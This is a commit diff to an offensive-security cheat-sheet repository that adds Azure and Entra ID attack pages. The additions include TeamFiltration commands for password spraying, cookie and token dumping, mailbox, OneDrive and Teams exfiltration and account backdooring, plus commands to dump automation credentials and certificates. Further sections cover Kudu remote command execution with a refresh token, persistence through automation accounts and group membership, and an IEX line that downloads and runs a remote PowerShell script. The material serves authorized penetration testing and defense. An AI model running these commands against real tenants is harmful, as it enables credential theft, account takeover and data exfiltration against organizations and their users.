Azure - Pages v0.1
Swissky
parent
bd1fe1e16b
commit
57e99121dc
|
|
@ -50,6 +50,7 @@ PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password"
|
|||
|
||||
## Federation
|
||||
|
||||
* [Golden SAML](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/)
|
||||
|
||||
|
||||
## AD Connect - Credentials
|
||||
|
|
|
|||
|
|
@ -142,6 +142,21 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock
|
|||
|
||||
## Service Principals
|
||||
|
||||
```ps1
|
||||
PS C:\> Get-AzureADServicePrincipal
|
||||
|
||||
ObjectId AppId DisplayName
|
||||
-------- ----- -----------
|
||||
00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
|
||||
012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
|
||||
06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
|
||||
092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
|
||||
0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
|
||||
0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
|
||||
0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
|
||||
0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code>
|
||||
```
|
||||
|
||||
|
||||
## Other
|
||||
|
||||
|
|
|
|||
|
|
@ -44,6 +44,18 @@
|
|||
PS C:> Get-AzureInTuneScript
|
||||
PS C:> Show-AzureKeyVaultContent -All
|
||||
```
|
||||
* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
|
||||
```ps1
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
|
||||
```
|
||||
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
|
||||
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
|
||||
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
|
||||
|
|
@ -112,6 +124,12 @@ The default lockout policy tolerates 10 failed attempts, then lock out an accoun
|
|||
```powershell
|
||||
o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
|
||||
```
|
||||
* [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration)
|
||||
```powershell
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
|
||||
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
|
||||
```
|
||||
|
||||
## Azure Services Enumeration
|
||||
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@
|
|||
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
|
||||
```
|
||||
|
||||
|
||||
## Add Service Principal
|
||||
|
||||
* Generate a new service principal password/secret
|
||||
|
|
@ -32,6 +33,13 @@
|
|||
```
|
||||
|
||||
|
||||
## Add User to Group
|
||||
|
||||
```ps1
|
||||
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,53 @@
|
|||
# Azure Services - Container Registry
|
||||
|
||||
## Enumerate
|
||||
|
||||
List container registries in the subscription using Azure CLI
|
||||
|
||||
```ps1
|
||||
az login -u user@domain.onmicrosoft.com -p pass
|
||||
az acr list -o table
|
||||
```
|
||||
|
||||
Login to the Registry
|
||||
|
||||
```ps1
|
||||
acr=<ACRName> # from the previous command
|
||||
server=$(az acr login -n $acr --expose-token --query loginServer -o tsv)
|
||||
token=$(az acr login -n $acr --expose-token --query accessToken -o tsv)
|
||||
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
|
||||
```
|
||||
|
||||
List the images in the ACR
|
||||
|
||||
```ps1
|
||||
az acr repository list -n $acr
|
||||
```
|
||||
|
||||
List version tags for an image
|
||||
```ps1
|
||||
az acr repository show-tags -n $acr --repository mywebapp
|
||||
```
|
||||
|
||||
Connect to the container registry from a PowerShell console, set the $server and $token variables, and pull the image from the registry
|
||||
|
||||
```ps1
|
||||
# docker login ${registryURI} --username ${username} --password ${password}
|
||||
$token="<AccessToken>"
|
||||
$server="<LoginServer>"
|
||||
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
|
||||
docker pull $server/mywebapp:v1
|
||||
```
|
||||
|
||||
List docker containers inside a registry
|
||||
|
||||
```ps1
|
||||
IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
|
||||
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
|
||||
Get-AzACR -username ${username} -password ${password} -registry ${registryURI}
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [PENTESTING AZURE: RECON TECHNIQUES - April 29, 2022 Stefan Tita](https://securitycafe.ro/2022/04/29/pentesting-azure-recon-techniques/)
|
||||
|
|
@ -1,8 +1,16 @@
|
|||
# Azure Services - Runbook
|
||||
# Azure Services - Runbook and Automation
|
||||
|
||||
## Runbook
|
||||
|
||||
Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||
|
||||
## Create a Runbook
|
||||
### List the Runbooks
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount | Get-AzAutomationRunbook
|
||||
```
|
||||
|
||||
### Create a Runbook
|
||||
|
||||
* Check user right for automation
|
||||
```powershell
|
||||
|
|
@ -18,7 +26,27 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
|||
* Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
|
||||
|
||||
|
||||
## Persistence via Automation accounts
|
||||
## Automation Account
|
||||
|
||||
### List Automation Accounts
|
||||
|
||||
Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment.
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount
|
||||
```
|
||||
|
||||
### Get Automation Credentials
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount | Get-AzAutomationCredential
|
||||
Get-AzAutomationAccount | Get-AzAutomationConnection
|
||||
Get-AzAutomationAccount | Get-AzAutomationCertificate
|
||||
Get-AzAutomationAccount | Get-AzAutomationVariable
|
||||
```
|
||||
|
||||
|
||||
### Persistence via Automation Accounts
|
||||
|
||||
* Create a new Automation Account
|
||||
* "Create Azure Run As account": Yes
|
||||
|
|
@ -39,6 +67,22 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
|||
```
|
||||
|
||||
|
||||
## Desired State Configuration
|
||||
|
||||
### List the DSC
|
||||
|
||||
```ps1
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
|
||||
```
|
||||
|
||||
### Export the configuration
|
||||
|
||||
```ps1
|
||||
$DSCName = ${dscToExport}
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -march $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* []()
|
||||
|
|
@ -5,6 +5,7 @@
|
|||
* Data Tables - `*.table.core.windows.net`
|
||||
* Queues - `*.queue.core.windows.net`
|
||||
|
||||
|
||||
## Enumerate blobs
|
||||
|
||||
```powershell
|
||||
|
|
@ -13,6 +14,7 @@ PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
|||
Found Storage Account - redacted.blob.core.windows.net
|
||||
```
|
||||
|
||||
|
||||
## List and download blobs
|
||||
|
||||
```powershell
|
||||
|
|
@ -22,6 +24,13 @@ PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -Resou
|
|||
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
|
||||
```
|
||||
|
||||
Retrieve exposed containers with public access
|
||||
|
||||
```ps1
|
||||
PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}}
|
||||
```
|
||||
|
||||
|
||||
## SAS URL
|
||||
|
||||
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
||||
|
|
|
|||
|
|
@ -1,8 +1,29 @@
|
|||
# Azure Services - Web Apps
|
||||
|
||||
## List Web App
|
||||
|
||||
```ps1
|
||||
az webapp list
|
||||
```
|
||||
|
||||
## Execute Commands
|
||||
|
||||
```ps1
|
||||
$ARMToken = Get-ARMTokenWithRefreshToken `
|
||||
-RefreshToken "0.ARwA6WgJJ9X2qk..." `
|
||||
-TenantID "contoso.onmicrosoft.com"
|
||||
|
||||
Invoke-AzureRMWebAppShellCommand `
|
||||
-KuduURI "https://<webapp>.scm.azurewebsites.net/api/command" `
|
||||
-Token $ARMToken `
|
||||
-Command "whoami"
|
||||
```
|
||||
|
||||
## SSH Connection
|
||||
|
||||
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
|
||||
|
||||
|
||||
```powershell
|
||||
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
|
||||
```
|
||||
|
|
|
|||
Loading…
Reference in New Issue